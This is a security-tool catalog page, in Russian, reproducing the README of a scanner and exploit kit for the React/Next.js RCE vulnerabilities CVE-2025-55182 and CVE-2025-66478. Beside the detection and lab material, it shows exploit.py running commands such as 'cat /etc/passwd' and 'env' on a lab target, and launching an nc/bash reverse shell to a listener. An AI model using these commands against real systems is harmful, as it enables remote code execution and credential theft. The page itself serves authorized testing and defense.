Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
react2shell-scanner-CVE-2025-55182 — React2shell-web-scanner | Kitploit
Инструменты/GitHubGitHub/security-phoenix-demo/react2shell-scanner-cve-2025-55182
Управление индикаторами компрометации (IOC)Сканеры уязвимостейЭксплуатацияЭксплуатация веб-приложенийРазведка угрозПеречисление ПоддоменовОбучение и ОбразованиеРазработка Полезной НагрузкиЛаборатории и Практика

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
GitHubsecurity-phoenix-demo/react2shell-scanner-cve-2025-55182

react2shell-scanner-CVE-2025-55182

React2shell-web-scanner

Репозиторий
28 месяцев назадЕщё не проверено

Корпоративный сканер React2Shell

Высокоточный сканер уязвимостей для CVE-2025-55182 и CVE-2025-66478 — уязвимостей удалённого выполнения кода (RCE) в React Server Components / Next.js.

📖 Подробный технический анализ, механику эксплуатации и данные IOC см. в SECURITY-RESEARCH.md


⚠️ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ

Этот инструмент предоставляется ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ И АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ. Несанкционированный доступ к компьютерным системам является незаконным. Используйте эти инструменты только на системах, которыми вы владеете или на тестирование которых у вас есть явное письменное разрешение. Авторы не несут ответственности за неправомерное использование.


🚨 Обзор уязвимостей

CVEОписаниеCVSS
CVE-2025-55182Небезопасная десериализация RCE в React Server Components9.8 Критический
CVE-2025-66478RCE в Next.js Server Actions9.8 Критический

Затронутые пакеты:

  • react-server-dom-webpack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-turbopack: 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • react-server-dom-parcel: 19.1.0, 19.1.1, 19.2.0

Исправленные версии:

  • 19.0.1, 19.1.2, 19.2.1 (для всех пакетов)

✨ Возможности

  • Множественные цели: одиночный URL, файлы хостов, CIDR-диапазоны, IP-диапазоны
  • Перебор поддоменов: автоматическое обнаружение поддоменов
  • Определение технологий: обнаружение Next.js перед тестированием
  • Безопасный режим обнаружения: выявление по побочным каналам без выполнения кода
  • Проверка RCE: proof of concept на основе арифметических операций
  • Корреляция IOC: проверка по известной вредоносной инфраструктуре
  • Интеграция с Phoenix Security: загрузка результатов на платформу Phoenix
  • Параллельное сканирование: многопоточность для масштабирования

📦 Установка

С помощью uv (рекомендуется)

root@kitploit:~
# No installation needed - uv handles dependencies
uv run react2shell-scanner -u https://example.com

С помощью pip

root@kitploit:~
pip install requests tqdm dnspython
python3 react2shell-scanner -u https://example.com

🚀 Использование

Базовое сканирование

root@kitploit:~
# Single URL
python3 react2shell-scanner -u https://example.com

# Safe mode (no RCE execution)
python3 react2shell-scanner -u https://example.com --safe-check

# From host file
python3 react2shell-scanner -l targets.txt -t 50 -o results.json

# CIDR range
python3 react2shell-scanner --cidr 192.168.1.0/24 --ports 80,443,3000

# Multiple CIDR ranges
python3 react2shell-scanner --cidr 10.0.0.0/24 --cidr 172.16.0.0/24

Расширенное сканирование

root@kitploit:~
# Subdomain enumeration
python3 react2shell-scanner -u example.com --enumerate-subdomains

# Custom subdomain wordlist
python3 react2shell-scanner -u example.com --enumerate-subdomains \
    --subdomain-wordlist "app,api,admin,portal,staging"

# Custom paths
python3 react2shell-scanner -u https://example.com \
    --path / --path /_next --path /api

# Skip fingerprinting (scan everything)
python3 react2shell-scanner -l targets.txt --skip-fingerprint --force-scan

# Verbose with SSL disabled
python3 react2shell-scanner -u https://example.com -k -v

Интеграция с Phoenix Security

root@kitploit:~
# Upload findings to Phoenix
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --phoenix-config .phoenix.config

# Debug mode (save payloads)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --debug

# Upload all results (not just vulnerabilities)
python3 react2shell-scanner -l targets.txt \
    --upload-phoenix \
    --all-results

🔧 Настройка

Конфигурация Phoenix Security

Создайте файл .phoenix.config:

root@kitploit:~
[phoenix]
client_id = your_client_id_here
client_secret = your_client_secret_here
api_base_url = https://api.demo.appsecphx.io
assessment_name = React2Shell Scanner - Web Vulnerabilities
import_type = new

Или используйте переменные окружения:

root@kitploit:~
export PHOENIX_CLIENT_ID=your_client_id
export PHOENIX_CLIENT_SECRET=your_client_secret
export PHOENIX_API_URL=https://api.demo.appsecphx.io
export PHOENIX_ASSESSMENT_NAME="React2Shell Scanner"

🧪 Тестовая лаборатория

В комплект входит тестовая среда на базе Docker. Краткую справку см. в Lab-instructions-sample.md.

root@kitploit:~
# Start lab
cd test-lab/lab
docker-compose up -d

# Services:
# - Vulnerable: http://localhost:3011
# - Patched:    http://localhost:3012

# Test vulnerable instance (safe evidence collection)
python3 react2shell-scanner -u http://localhost:3011 -o evidence.json -e

# Test patched instance  
python3 react2shell-scanner -u http://localhost:3012 -o evidence.json -e

# Run full demo
./test-and-demo.sh --full-demo

⚠️ Примечание: Команды эксплуатации (например, exploit.py -c "whoami") выполняют РЕАЛЬНЫЙ RCE. Используйте только на локальных Docker-контейнерах в исследовательских целях.

💻 Инструмент эксплуатации (exploit.py)

Выполняет команды на уязвимых целях. Требуется Python 3.11+

Установка

root@kitploit:~
cd test-lab
pip3.11 install -r requirements.txt
# Or: pip3.11 install rich-click fake-useragent rich requests

Примеры выполнения команд

root@kitploit:~
# Basic command execution
python3.11 exploit.py -u http://localhost:3011 -c "whoami"
# Output: nextjs

python3.11 exploit.py -u http://localhost:3011 -c "id"
# Output: uid=1001(nextjs) gid=65533(nogroup) groups=65533(nogroup)

python3.11 exploit.py -u http://localhost:3011 -c "hostname"
# Output: 99e28775bf80 (container ID)

# System enumeration
python3.11 exploit.py -u http://localhost:3011 -c "uname -a"
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/passwd"
python3.11 exploit.py -u http://localhost:3011 -c "env | head -20"

# Application reconnaissance
python3.11 exploit.py -u http://localhost:3011 -c "pwd"
# Output: /app

python3.11 exploit.py -u http://localhost:3011 -c "ls -la"
python3.11 exploit.py -u http://localhost:3011 -c "cat package.json"
python3.11 exploit.py -u http://localhost:3011 -c "node --version"

# Network information
python3.11 exploit.py -u http://localhost:3011 -c "cat /etc/hosts"
python3.11 exploit.py -u http://localhost:3011 -c "netstat -an | head -20"

# Process enumeration
python3.11 exploit.py -u http://localhost:3011 -c "ps aux"

Обратная оболочка (Reverse Shell, расширенный режим)

root@kitploit:~
# Get Docker network gateway
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')

# Start listener (in another terminal)
nc -lvnp 4444

# Launch reverse shell
python3.11 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo

# Available payload types: nc, nc-mkfifo, sh, bash, perl

Параметры инструмента эксплуатации

📊 Форматы вывода

Вывод в консоль

root@kitploit:~
[VULNERABLE] https://vulnerable.example.com
    Status: 307
    Detection: rce_arithmetic_check
    
[IOC MATCH] 93.123.109.247
    IP 93.123.109.247 matches known malicious infrastructure
    
[NEXTJS] https://safe.example.com v15.0.0

[NOT VULN] https://other.example.com

Вывод в JSON

root@kitploit:~
{
  "scan_time": "2025-12-08T10:00:00Z",
  "scanner": "React2Shell Scanner v2.0",
  "cves": ["CVE-2025-55182", "CVE-2025-66478"],
  "total_scanned": 100,
  "vulnerable_count": 3,
  "ioc_matches": 1,
  "results": [
    {
      "target": "https://vulnerable.example.com",
      "ip": "203.0.113.50",
      "fqdn": "vulnerable.example.com",
      "verdict": "VULNERABLE",
      "vulnerable": true,
      "nextjs_detected": true,
      "detection_method": "rce_arithmetic_check"
    }
  ]
}

🔍 Корреляция IOC

Сканер включает известные индикаторы компрометации (IOC) из активных кампаний эксплуатации:

  • 32 вредоносных IP-адреса из payloads-exploits/iocs.csv
  • Боевые полезные нагрузки из payloads-exploits/weaponized-payloads
  • Расширенные IOC, включая домены, URL, хеши файлов и криптовалютные кошельки, в payloads-exploits/iocs_patterns.csv

Обнаруженные совпадения по IOC помечаются как имеющие высокий уровень критичности.

Файлы IOC

FileСодержимое
iocs.csv32 известных вредоносных IP-адреса с данными геолокации

🛡️ Методы обнаружения

Безопасная проверка по побочному каналу (--safe-check)

  • Отправляет повреждённую полезную нагрузку, вызывающую ответ с ошибкой
  • Без выполнения кода на цели
  • Определяет, есть ли на цели уязвимая десериализация
  • Рекомендуется для пассивной разведки

Арифметическая проверка RCE (по умолчанию)

  • Отправляет полезную нагрузку, выполняющую echo $((41*271))
  • Проверяет, что ответ содержит вычисленный результат (11111)
  • Подтверждает фактическую возможность выполнения кода
  • Используйте только на авторизованных целях

📁 Структура проекта

root@kitploit:~
react2shell-scanner-CVE-2025-55182/
├── react2shell-scanner          # Main scanner script
├── cve-2025-66478-web-scan     # Original scanner reference
├── nuclei-rules                 # Nuclei template
├── test-and-demo.sh            # Test automation
├── README.md                    # This file
├── SECURITY-RESEARCH.md         # Detailed technical analysis
├── Lab-instructions-sample.md   # Quick lab testing guide
├── payloads-exploits/
│   ├── iocs.csv                 # Known malicious IPs
│   ├── iocs_patterns.csv        # Extended IOCs (domains, URLs, hashes)
│   ├── weaponized-payloads      # Real-world attack payloads
│   └── exploit-2025-55182       # Raw HTTP exploit request
└── test-lab/
    ├── exploit.py               # Exploitation tool
    ├── lab/
    │   ├── docker-compose.yml
    │   ├── vulnerable/          # Vulnerable Next.js app
    │   └── patched/             # Patched Next.js app
    └── packages/
        ├── vulnerable/          # Vulnerable npm packages
        └── patched/             # Patched npm packages

🔗 Связанные репозитории

RepositoryНазначение
react2shell-scanner-CVE-2025-55182Лабораторные среды, сканер и эксплойты (этот репозиторий)
react2shell-scanner-rce-react-nextПолноценный сканер с веб-интерфейсом

⚠️ Правовой отказ от ответственности

Этот инструмент предоставляется только для авторизованного тестирования безопасности. Перед сканированием любых целей вы должны иметь явное письменное разрешение. Несанкционированное сканирование может нарушать законы о компьютерных преступлениях.

Используйте ответственно:

  • Сканируйте только системы, которыми вы владеете или на тестирование которых у вас есть разрешение
  • Документируйте свои разрешения
  • Сообщайте об уязвимостях через надлежащие каналы
  • Соблюдайте практики ответственного раскрытия информации

📚 Ссылки

  • Консультация по CVE-2025-55182
  • Блог React Security
  • Консультация по безопасности Next.js GHSA-9qr9-h5gf-34mp
  • Журнал изменений Vercel
  • Исследования Assetnote

🙏 Благодарности

  • Команда исследования безопасности Assetnote — первоначальное исследование уязвимостей
  • Chocapikk — разработка эксплойта
  • Phoenix Security — интеграция платформы

Подготовлено исследователями безопасности, работающими над тем, чтобы сделать веб безопаснее.

Скачать инструмент
OptionОписание
-u, --urlURL цели (обязательно)
-c, --cmdКоманда для выполнения
-r, --reverseВключить режим обратной оболочки
-l, --lhostХост-слушатель для обратной оболочки
-p, --lportПорт-слушатель для обратной оболочки
-P, --payloadТип полезной нагрузки: nc, nc-mkfifo, sh, bash, perl
--timeoutТаймаут запроса (по умолчанию: 10 с)
iocs_patterns.csvРасширенные IOC: C2-домены, URL дропперов, хеши вредоносного ПО, Monero-кошельки
weaponized-payloadsРеальные атакующие полезные нагрузки, наблюдавшиеся при активной эксплуатации
exploit-2025-55182Формат исходного HTTP-запроса для эксплойта